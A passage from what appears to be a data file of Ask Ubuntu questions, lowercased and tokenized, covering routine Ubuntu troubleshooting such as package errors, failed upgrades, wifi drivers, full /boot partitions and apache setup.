reading state information ... done package curl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libc6 : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libc-bin initscripts locales tzdata libdb1-compat : i386 libdb1-compat package libgl1-mesa-glx : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libgl1-mesa-dri : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libgl1-mesa-glx e : package 'curl ' has no installation candidate e : package 'libgl1-mesa-dri : i386 ' has no installation candidate e : package 'libgl1-mesa-glx : i386 ' has no installation candidate e : package 'libc6 : i386 ' has no installation candidate press return to continue : if press enter or exit out it will open again after displaying the following error message : you are missing the following 32-bit libraries , and steam may not run : libc.so.6 when i try to open the deb and install it through the software center it reads : dependency is not satisfiable curl while i was typing this usc has deleted steam from my applications , removed steam from its download list , readded it and when i installed it through the marketplace again i get this `` processing your request for 'steam ' ... '' `` information recieved . '' which is what it did earlier and it will go on indefinitely .
513621	can i avoid reinstalling from scratch ?	i asked for assistance about a month ago , but have n't received a single response . if i asked incorrectly or broke etiquette rules i am truly sorry . the link to my original query ( in case anybody cares to check ) is upgrade from 13.10 to 14.04 failed instead of restating the question i would simply like to ask ; is it possible for me to fix this failed installation ? or am i doomed to starting over ? i have the system working like i want so i really hope i do n't need to reload . but if i do , is there a recommended way to back up what i have , so i do n't need to totally reinvent the wheel ? thanks in advance for your assistance . -brian
513623	gem5 parser error	i am trying to run parser from here , but it gives this error : this program requires jinja2 version 2.7 or later i have already installed the jinja2 package by running sudo apt-get install python-jinja2 . can anyone tell me what i 'm doing wrong ( with a little guide to run the tool as well ) ? the m5out folder is here , with the stats for a arm core simulation , so you do n't have to install gem5 to get those two files required by the script .
513625	ubuntu 14.04 lts amd64 randomly uninstals packages / applications	i am having a strange issue . occasionally when installing new packages , i will get a system crash notification which i will report . the environment then becomes unstable , unity crashes and all open windows , loose title bars , and the main launcher shuts down . i usually have to run the command unity -- replace to restore functionality , but ultimately end up having to reboot . upon booting back up i find all of my user-installed packages are gone and i have to reinstall them via apt . please tell me someone else is having this issue , because this is the second system and third install i have had this issue on .
513626	can not compile gdb7.8 with python support	i am trying to install gdb7.8 with python support . from the source folder , i am running ./configure -- with-python when i did tab-complete from -- with- i did not see python in the list . but when i ran configure with that flag , it did not baulk . when i run make , it complains that python is not found . checking for python2.7 ... no but python is installed : $ which python python python2.7 python2.7-dbg-config python2 python2.7-dbg $ which python2.7 /usr/bin/python2.7 i compiled gdb without -- with-python and things installed without error . i was under the impression that gdb7.8 had python support without the need for special flags . but when i run : $ gdb python ( gdb ) run test.py i get some sort of can not import gdb import error so then i tried calling `` pi '' : ( gdb ) pi printf.py python scripting is not supported in this copy of gdb . so ... how do i get python support in gdb7.8 ? is it actually not supported ? or should i not call `` pi '' ?
513630	can not write to www and update wordpress at same time	i have lamp installed on my ubuntu 14.04 server and am using apache as a web server . i am going to be using the web server for wordpress primarily . the problem i am running into is that i can not update wordpress or add plugins the standard way . it keeps asking me for my ftp credentials . i did some googling and was able to fix the wordpress update problem by changing ownership of the www folder to www-data : www-data . the problem with doing this , though , is i no longer am able to edit the shared files through samba . when i change ownership to user : www-data i can modify the files but can not update wordpress without it asking for ftp . the folder is chmod 755 and i do not want to go to 777 . so ... can anyone help point me in the right direction to correct this ? i am brand new to ubuntu and would really appreciate any pointers . thanks !
513631	why does n't my launcher-locked device ( hard disk partition ) has a shortcut ?	why does n't my launcher-locked device ( hard disk partition ) has a shortcut ? it 's on the very top , but i can not open it with shortcuts , like super key+1 . if i could , it 'll ease things for me , for i would be able to mount it immediately without the help of mouse .
513636	trying ubuntu , new to linux	if i do the `` try '' ubuntu option where i dont install it to my hdd how , but just boot ubuntu from a flash drive , and i do not like it , how do i switch back to my windows 8 ?
513641	can we have both 32 bit & 64 bit architecture on a single machine	most softwares support 32 bit architecture . some high end software need 64 bit architecture . can we have both architecture on a single distro ?
513645	dpkg reporting as installed , uninstalled kernels	i have run the following command to remove old kernels : dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge and only the current kernel is now installed , which i have confirmed in synaptic and by checking my boot partition . however , when i run : dpkg -- list | grep linux-image i get the following response : rc linux-image-3.13.0-30-generic 3.13.0-30.55 amd64 linux kernel image for version 3.13.0 on 64 bit x86 smp rc linux-image-3.13.0-32-generic 3.13.0-32.57 amd64 linux kernel image for version 3.13.0 on 64 bit x86 smp ii linux-image-3.13.0-34-generic 3.13.0-34.60 amd64 linux kernel image for version 3.13.0 on 64 bit x86 smp rc linux-image-extra-3.13.0-30-generic 3.13.0-30.55 amd64 linux kernel extra modules for version 3.13.0 on 64 bit x86 smp rc linux-image-extra-3.13.0-32-generic 3.13.0-32.57 amd64 linux kernel extra modules for version 3.13.0 on 64 bit x86 smp ii linux-image-extra-3.13.0-34-generic 3.13.0-34.60 amd64 linux kernel extra modules for version 3.13.0 on 64 bit x86 smp ii linux-image-generic 3.13.0.34.40 amd64 generic linux kernel image probably not a problem , but just wondering why versions -30 and -32 are reported as present . can it be rectified ? tia
513646	windows 7 as second os	i know there are many similar questions but i could n't find any good answeres on my subject . so i am trying to install windows 7 as second os but without a bootable dvd . still legal i guess , have my key but never got an original copy with my laptop . but whatever now i wanted to install it with virtualbox but i seem to be completely unable to connect the ( real ) partition i wanted to install it on with the virtual machine . btw using microsofts dev vm for ie so any ideas on how to do that maybe ? or helpful links ? found a couple on google already but they never worked for me like advertised or maybe i 'm just stupid , i do n't know .
513647	unrar folder with password ( terminal )	i 'm using this command to unrar folders : for file in *.part01.rar ; do unrar x $ { file } ; done ; but i do n't know where to add the password in this command . because right now , this command wants the password for every archive in that folder . thanks
513651	address book authentication	i just upgraded to ubuntu 14.04.1 and run gnome shell . i am consistently getting a pop up window prompting me for my gmail address book authentication . the window pops up the moment i type something into gnome shell after hitting the super key . i 'm assuming that ubuntu wants to search my address book for people to include in the search . i have opened up the settings and deleted my account from the online accounts section and rebooted , nothing seems to stop the popup . where is it getting my email address from ? most importantly , how to i stop this super annoying popup from appearing ?
513652	problem running apt-get dpkg broken ?	problem when runing apt-get debian av # sudo dpkg -- configure -a setting up libgdata2.1-cil ( 2.2.0.0-2 ) ... mono : ../nptl/pthread_mutex_lock.c:80 : __pthread_mutex_cond_lock : assertion `mutex- > __data.__owner == 0 ' failed . native stacktrace : /usr/bin/mono ( ) [ 0x4ac5a1 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0xf8f0 ) [ 0x7fee2c0e88f0 ] /lib/x86_64-linux-gnu/libc.so.6 ( gsignal+0x37 ) [ 0x7fee2bd65407 ] /lib/x86_64-linux-gnu/libc.so.6 ( abort+0x148 ) [ 0x7fee2bd68508 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x2e516 ) [ 0x7fee2bd5e516 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x2e5c2 ) [ 0x7fee2bd5e5c2 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0x113f6 ) [ 0x7fee2c0ea3f6 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( pthread_cond_wait+0x150 ) [ 0x7fee2c0e5140 ] /usr/bin/mono ( ) [ 0x6058b3 ] /usr/bin/mono ( ) [ 0x5fdd25 ] /usr/bin/mono ( ) [ 0x604077 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0x80ca ) [ 0x7fee2c0e10ca ] /lib/x86_64-linux-gnu/libc.so.6 ( clone+0x6d ) [ 0x7fee2be1605d ] debug info from gdb : ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= aborted mono : ../nptl/pthread_mutex_lock.c:80 : __pthread_mutex_cond_lock : assertion `mutex- > __data.__owner == 0 ' failed . native stacktrace : /usr/bin/mono ( ) [ 0x4ac5a1 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0xf8f0 ) [ 0x7fcec8eef8f0 ] /lib/x86_64-linux-gnu/libc.so.6 ( gsignal+0x37 ) [ 0x7fcec8b6c407 ] /lib/x86_64-linux-gnu/libc.so.6 ( abort+0x148 ) [ 0x7fcec8b6f508 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x2e516 ) [ 0x7fcec8b65516 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x2e5c2 ) [ 0x7fcec8b655c2 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0x113f6 ) [ 0x7fcec8ef13f6 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( pthread_cond_wait+0x150 ) [ 0x7fcec8eec140 ] /usr/bin/mono ( ) [ 0x6058b3 ] /usr/bin/mono ( ) [ 0x5fdd25 ] /usr/bin/mono ( ) [ 0x604077 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0x80ca ) [ 0x7fcec8ee80ca ] /lib/x86_64-linux-gnu/libc.so.6 ( clone+0x6d ) [ 0x7fcec8c1d05d ] debug info from gdb :
513654	how to set environment variable in eric python ide	i have no problem running a python script from the terminal , but in eric python ide , i am getting this error : importerror libcudart.so.6.0 : can not open shared object file : no such file or directory perhaps it 's an environment variable that needs to be set . in eric , when i run script , i filled in the environment option as follows . i tried set path = usr/local/cuda-6.0/bin or path = /usr/local/cuda-6.0/bin or just /usr/local/cuda-6.0/bin and they all did n't work .
513657	how do i remove skype 4.3 from ubuntu 14.04 lts ( 32-bit )	i installed skype on my nephew 's new ubuntu 14.04 lts machine , and now we 've decided to remove it . but i 'm not able to locate it in my installed programs section of ubuntu software center . i 'm able to call it up by opening the debian package , software center opens it up , but where i would normally see the `` remove '' button , i have a `` reinstall '' button . for the life of me , i ca n't figure out how to uninstall skype . any suggestions ? in case you 're wondering i used the version of skype designed for 12.xx , as there was no option available for ubuntu 14.xx .
513660	switching to ubuntu 14.04 from windows 8.1	everyone i am newto these linux stuffs . currently i 'm a user of windows8.1 . when windows 8 was roling out i was like i 'm never going to leave and will be always stick to windows8 but now i think it 's time to switch linux because being in windows forever i do n't think i can do something very good .i wanted to be opensource : ) . so i really dont have any idea about linux . for me the best distro is ubuntu and kubuntu offcourse the latest release . so what i 'm afraid of switching to linux is its compability .the compatibility i 'm talking about is with the hardware 's and driver's . for eg sometime after fresh install of windows we need to install the display , usb and wifi drivers to function . for some computer or brands those driver 's are hard to find and i ca n't even think of linux how hard are they to find if it needs installing drivers . so my main question is that do i need to install the drivers for my wifi adapters display and some other stuffs or the distro i choosed i.e ubuntu 14.0.4 consists of those dirvers and what about the 64 and 32bit . my machines is 64bit aso do i need to install the 64bit one . i mean i know the advantages of installing the 64 bit one but like windows is it kinda hard to find softwares for the 64 bit one . or the 32 bit is recommended . and yes i will be highly appreciated for the answers to my questions . thank you : )
513663	i am not able to connect to wifi network	i had tried every code every idea every thing but i failed wireless driver broadcom bcm43412 , but when i checked pci-id it show not supported . my pci id is 14e4:4365 and chip id is bcm43142 . i tried edit connection myself to also but i ca n't what to put in clone mac address place ? device mac address is the router mac adress but what is clone mac address ? i had placed my laptop mac address in place of clone mac address but it does n't work . tried every thing but it not work checked additional driver by going system settings it does n't contain any drivers , tried internet by cable then it connects then how should i correct this ? my ubuntu version is 13.10
513666	why is lubuntu default desktop environment	so i just wanted to try things out on 14.04 , so i did sudo apt-get install lxde sudo apt-get install lubuntu-desktop when i get to the greeter , it reads lubuntu ( default ) lubuntu netbook lxde openbox ubuntu why is lubuntu default ? i do n't know if its because its the last thing i installed or if its because it is in alphabetical order . i 'm tempted to test this theory by installing xubuntu and see if it becomes default . i 'd like it to read ubuntu ( default ) and have the ubuntu splash instead . when i open lightdm.conf , there is no line `` user-session '' nor `` greeter-session '' . they are missing . is this normal and i have to add it manually ?
513671	i can not download anything	i am very new to ubuntu but decided to wipe my windows 7 and install it . i can not download anything from the software center . this is the error message i get . i can use the web in all other ways including this site . what can i do ? thanks , jason w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/restricted plus about 20 other lines .
513678	make ubuntu not club same type of tasks	i am using ubuntu 14.04 . when i do alt+tab to switch windows , ubuntu club the same type of tasks . for eg . if i have 2 chrome windows , and 2 firefox windows open , and i do alt+tab . i see only 2 and not 4 options . now when i stay on a single alt+tab option for a few seconds it then shows me the windows inside it . that is not the case in linux mint . linux mint shows all the tabs for all the programs running when we do alt+tab . is there a way , to do the same in ubuntu -- - not make it club the tasks when doing alt+tab ?
513680	python 2.7.8 and pyglet	i 've installed python2.7.8 as default version of python . pyglet worked perfectly before ( with version 2.7.6 ) . now , it says that there is no module named pyglet . what to do ? p.s . i 've already tried to remove pyglet ( with all its dependencies ) and to install it again , but problem remained .
513681	internet not working ( local network works ) after upgrade to 14.04	i have an internet connection that works through a proxy that requires username & password . after online upgrade to 14.04 from 12.04 , i am unable to connect to internet , pinging to popular sites does n't work . however , i am able to ping to local addresses in my office network . i shall post any more info if needed . i am a networking noob and did n't fiddle with anything in my network settings yet .
513683	ubuntu 14.04.1 installation error md5 hash mismatch	i have downloaded the iso file with correct md5sum hash ( 119cb63b48c9a18f31f417f09655efbd ) but while installing with wubi it says md5sum mismatch error as it is comparing the md5sum of the 14.04.1 with 14.04 which has md5sum hash as ( dccff28314d9ae4ed262cfc6f35e5153 ) . i am installing ubuntu inside windows and it creates a c : \ubuntu\install directory where it has ubuntu-14.04-desktop-amd64.metalink file while it should be ubuntu-14.04.1-desktop-amd64.metalink . i tried replacing the metalink file but while installing it again it deletes the existing install directory and creates it again with the incorrect metalink file . please tell me how to solve this ? thanks
513685	how do i make wallch reactivate live earth after suspend ?	when i close my laptop , the net connection stops . when i reopen it , wallch 4.0 says the net connection was lost . i have to then click activate to start live earth again . how do i get it to reactivate automatically when it wakes up ?
513686	qt5.1.1 installation problem	while i try to installing qt in ubuntu i got error as , qt : session management error : none of the authentication protocols specified are supported no marker found , stopped after 1.00 mib .
513687	why did my apt-get suddenly stop working ?	since yesterday i 've been unable to install stuff . i get errors like this : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libb/libbsd/libbsd-dev_0.4.2-1ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libe/libedit/libedit-dev_2.11-20080614-5ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? usung -- fix-missing on apt-get update does n't work either . changing the mirror in sources.list did n't change anything , it still fetches from in.archive.ubuntu.com . additionally , it seems like the repository is up , but half the files on it are down -- for example libedit-dev_2.11-20080614-5ubuntu1_amd64.deb does n't exist but libedit-dev_2.11-20080614-3ubuntu2_amd64.deb does . i 'm on raring ( temporary , but i ca n't upgrade immediately ) , which might be the issue . any quick fix for this ?
513688	setting up touch driver to run through service	we are trying to integrate a touch panel to our linux system . touch driver ( general touch ) i am trying to run this application in linux service.below are the steps which i followed driver installation cp -rf gentouch_s/ /usr/local/gentouch_s/ cp -f 10-evdev.conf /usr/share/x11/xorg.conf.d/10-evdev.conf cp -f 69-gentouch.rules /etc/udev/rules.d/69-gentouch.rules setting touch in service cp gentouchservice /etc/init.d/gentouchsevice chmod 755 /etc/init.d/gentouchsevice update-rc.d gentouchsevice defaults script details for : /etc/init.d/gentouchsevice # ! /bin/sh # /etc/init.d/gentouchsevice # # carry out specific functions when asked to by the system case `` $ 1 '' in start ) logger `` gentouch module started by service '' /usr/local/gentouch_s/gt_service start ; ; stop ) logger `` gentouch module stopped by service '' /usr/local/gentouch_s/gt_service stop ; ; restart ) logger `` gentouch module restarted by service '' /usr/local/gentouch_s/gt_service restart ; ; * ) echo `` usage : /etc/init.d/gentouchsevice { start|stop|restart } '' exit 1 ; ; esac exit 0 on doing this , i was pretty sure that the application started via service during boot up . verified by log ( 2014 aug 20 00:58:24 : :logger : : gentouch module started by service ) even though the service started , when i touch my screen i dont see any touch events ( no movement in pointer position too ) so , just tried restarting touch driver in below scenarios : 1 . service gentouchsevice restart no effeci , still there was no touch event detection 2./usr/local/gentouch_s/st_service restart my application was able to sense the touch events . what is the error.unable to find it
513690	both feet shot off : can boot neither ubuntu nor windows	i had kubuntu running in separate dual-boot lashup . when i booted , ubuntu came up as the first option . preparing to install mint , i deleted the kubuntu partition and created and formatted a mew mint partition . i rebooted , and nothing would boot - not even windows . all i see is a grub-rescue prompt . i had mint installed on a usb flash drive , so i stuck it in and rebooted from it . mint did boot , but will not allow me to install it - it says that both the mint partition and the windows partition are mounted . and it appears to be a rump version of mint with no application menu . any idea what i have done and how i could fix it ? i would ask the mint forum , but they require you have mint installed to even access their forum . i am figuring that whatever i did was at a deeper level than the adaptations mint have added to ubuntu .
513691	phpmyadmin not longer working after updating ubuntu lts12.04 to ubuntu lts14.04	after i upgraded ubuntu 12.04lts to ubuntu 14.04lts , i found that phpmyadmin is no longer working by calling http : //localhost/phpmyadmin . it did work on before upgrading . now i get this when trying to go to http : //localhost/phpmyadmin : not found the requested url /phpmyadmin/ was not found on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80
513693	unable to mount disk in ubuntu 13.10.please give me a solution	error mounting /dev/sda4 at /media/rahul/shrinkable : mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/rahul/shrinkable '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option.`
513697	library dependency problem with sphirewall-core and libboost	i am facing problems with library dependencies when trying to install sphirewall-core . is there any way to solve this or to install that dependencies ? these are the steps i followed : $ sudo apt-get install sphirewall-core reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : sphirewall-core : depends : libboost-random1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libboost-regex1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libboost-serialization1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libboost-system1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libboost-thread1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libprocps0 ( > = 1:3.3.2-1 ) but it is not installable depends : libboost-random1.49-dev but it is not installable e : unable to correct problems , you have held broken packages .
513702	wireless in virtualbox not working	i have ubuntu 14.04 installed . i have enabled the usb nic in settings in virtualbox manager but when i use lshw -c network it does not show the wireless nic using lsusb shows this output : bus 001 device 002 : id 13b1:003f linksys bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub i do n't know how to get the wireless to work ?
513707	unity reset error for ubuntu 14.04	** ( compiz:4310 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-6zyitnwdtq : connection refused warn 2014-08-20 12:23:49 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.shell ' yet as we do n't have a connection , waiting for it ... error 2014-08-20 12:23:50 unity.debug.interface debugdbusinterface.cpp:196 unable to load entry point in libxpathselect : libxpathselect.so.1.4 : can not open shared object file : no such file or directory warn 2014-08-20 12:23:50 xim.controller ximcontroller.cpp:103 ibus natively supported . warn 2014-08-20 12:23:50 unity < unknown > :0 could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-6zyitnwdtq : connection refused warn 2014-08-20 12:23:50 unityct ( io ) < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2014-08-20 12:23:50 unityct ( io ) < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2014-08-20 12:23:50 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2014-08-20 12:23:50 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2014-08-20 12:23:50 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... warn 2014-08-20 12:23:50 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.session ' yet as we do n't have a connection , waiting for it ... warn 2014-08-20 12:23:50 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.screensaver ' yet as we do n't have a connection , waiting for it ... error 2014-08-20 12:23:51 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'com.canonical.unity' error 2014-08-20 12:23:51 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'org.gnome.shell' error 2014-08-20 12:23:51 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'com.canonical.unity'
513710	how to prevent ubuntu server sleep/hibernation	i 'm running the latest ubuntu server ( quite literally downloaded & installed yesterday ) on a box under my desk . i 've got trac installed and openssh . intermittently both become unavailable , as if the server has gone to sleep , which seems odd because to me , the whole idea of a server is that it 's always on/available . the server is only used on the lan . i 've tried adding acpi=off to /etc/default/grub , running update and rebooting , no difference . currently , i have ssh open and if i leave it for some time , it will remain connected , but lag horribly when i go back to using it . last time this sleep/hibernate issue happened , i had to plug in a keyboard and monitor to get it come back up . any ideas or suggestions ?
513711	install ubuntu parallels with windows 8.1 in acer laptop	i have acer aspire e1-570 laptop with 2 gb ram with 32 bit windows 8.1 os . whether i can install ubuntu parallels with windows 8.1 on my laptop.is there any problem ?
513713	how to configure a network printer in ubuntu 14.04	i have 2 printers on a home wifi network that are accessed by 2 desktops running windows . i have a new laptop on which i am learning/trying ubuntu 14.04 . how do i configure things to access these printers from the laptop ? there seems to be a lot of jargon that i do n't understand or find confusing . step-by-step instructions would be helpful .
513714	install reliance driver software in ubuntu 14.04	i 'm using huawei ec 150 dongle . i need to install driver software it is quiet a big task for begineers in linux . so i took this matter over here . edit output of lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 003 : id 12d1:140b huawei technologies co. , ltd. ec1260 wireless data modem hsd usb card bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 002 device 002 : id 046d : c31d logitech , inc. media keyboard k200 bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
513715	upgrade svn version after ubuntu upgrade	yesterday i have upgrade my ubuntu version from 12.xx to 14.04 . everything is ok , excepted my svn server . now i got a error message and need to update svn version . after first searching in internet , i found some easy solution here . anyway , where is my repository of svn ? when i use the order which svn i get the link /usr/bin/svn . but what i should do now ? when i use sudo svn upgrade /usr/bin/svn i got a error message translated in english : svn : e155019 is not a basis of workprint and is impossible to open âť/usr/bin/.svn/entriesâť . i suppose , i 'm in the false directory , consequently the question is , how i can define the right path to my svn ? thanks in advance
513717	unable to install updates on 14.04 lts	i have been getting update notifications for a few weeks now but whenever i attempt to install them i get this message ; the upgrade needs a total of 74.6 m free space on disk '/boot ' . please free at least an additional 29.8 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . first of all i do n't have permission to access /boot ( do n't know why as its a standalone machine and i 'm the only user ) . secondly , i emptied the trash ; thirdly , i launched terminal and entered sudo apt-get clean i was a asked for a sudo password . i entered my system password . re-entered sudo apt-get clean . the cursor stopped blinking - i assumed it was doing it 's `` thing '' . i let it go for about 10 minutes then exited terminal . tried to install the updates but just got the same message . is there something i 'm ignorant of ? this is the output i get from the command df -h and i have no idea what it all means ! @ tim , what 's bash and why am i denied access to fstab and /boot ? mike @ mike-ms-7800 : ~ $ /etc/fstab bash : /etc/fstab : permission denied mike @ mike-ms-7800 : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 913g 11g 856g 2 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.7g 4.0k 1.7g 1 % /dev tmpfs 335m 1.6m 333m 1 % /run none 5.0m 4.0k 5.0m 1 % /run/lock none 1.7g 14m 1.7g 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/sda2 237m 182m 43m 81 % /boot /dev/sda1 487m 3.4m 483m 1 % /boot/efi /dev/sr1 31m 31m 0 100 % /media/mike/optus mobile mike @ mike-ms-7800 : ~ $ i ran this from the terminal and all is now working . dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge
513719	convert physical to virtual - gpt system error	i 'm trying to convert physical ubuntu machine to virtual using vmware . i keep getting this error : '' the source computer has gpt disk ( s ) . conversion of live computers with gpt disks is not supported . conversion of virtual machines with gpt disk is supported only if disk-based cloning is performed . '' i checked my disks and found that i have got one partition with gpt system . i can not risk bringing down this physical machine.. so does anyone have any idea what 's the best approach to resolve this issue ?
513721	reinstalling apache2	i had to reinstall my apache2 and did this as described in here : how reinstall apache2 ? unfortunately it did n't work and i do n't get the localhost site yet . sudo /etc/init.d/apache2 restart does n't give me any response and whereis apache2 gives : /etc/apache2 and /usr/share/apache2 and by the way i had installed everything with this tutorial : http : //community.linuxmint.com/tutorial/view/486 ... if this helps to solve the problem appreciate every suggestion !
513724	usb mass storage could n't get mounted	it 's my android phone sd card which was indicated damaged by android yesterday night , out of the blue ! i put it directly to a usb port with a usb sd card holder case , so in that way i can recover it with testdisk , which i had experienced before on a similar situation . i also noticed that there is a change in file system and capacity : file system : raw capacity : 0 ( unknown capacity ) also testdisk does n't show it on its partitions list . a 2 gb sd card is not that important in price but i 've a lot of files and medias which i need them . used a mini card reader , testdisk displayed it on its list but a quick search and or a deep search does n't have any results no partition found or selected for recovery and then i should quit the program . your help is appreciated . update # 2 lsusb output : bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 04f3:0234 elan microelectronics corp . bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 058f:6366 alcor micro corp. multi flash reader bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 006 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
513727	software icon ( from sublime text ) is n't displayed in launcher	i can start the software and find it over the dash , but no icon is shown ( a blank sheet in the dash and a question mark in launcher ) . sublime text is sitting in /opt/sublime_text/ . sudo sublime /usr/share/applications/sublime.desktop looks as following : [ desktop entry ] version=3.0 name=sublime text 3 # only kde 4 seems to use genericname , so we reuse the kde strings . # from ubuntu 's language-pack-kde-xx-base packages , version 9.04-20090413 . genericname=text editor exec=sublime terminal=false icon=/opt/sublime_text/icon/48x48/sublime_text.png type=application categories=texteditor ; ide ; development x-ayatana-desktop-shortcuts=newwindow [ newwindow shortcut group ] name=new window exec=sublime -n targetenvironment=unity i got also a `` ? '' on icons from applications unity wants me to install from firefox ( like tumblr , gmail ) .
513728	graphics problem while installing ubuntu	respected sir/mam while i am going to install ubuntu my laptop giving a error after installation that my system is running in low graphics.i have a laptop having amd redeon graphics card..what should i do to fix this problem.. thanks & regards rishav raj
513729	not able to clean out old kernel files in /boot	i am trying to update my server navin @ ubuntu : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-generic : depends : linux-image-3.2.0-67-generic but it is not installed e : unmet dependencies . try using -f. when i tried with the apt-get -f install navin @ ubuntu : ~ $ sudo apt-get -f install linux-image-3.2.0-67-generic reading package lists ... done building dependency tree reading state information ... done suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-67-generic 0 upgraded , 1 newly installed , 0 to remove and 29 not upgraded . 15 not fully installed or removed . need to get 0 b/38.8 mb of archives . after this operation , 150 mb of additional disk space will be used . ( reading database ... 147902 files and directories currently installed . ) unpacking linux-image-3.2.0-67-generic ( from ... /linux-image-3.2.0-67-generic_3.2.0- 67.101_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-67-generic_3.2.0- 67.101_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-67-generic ' : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 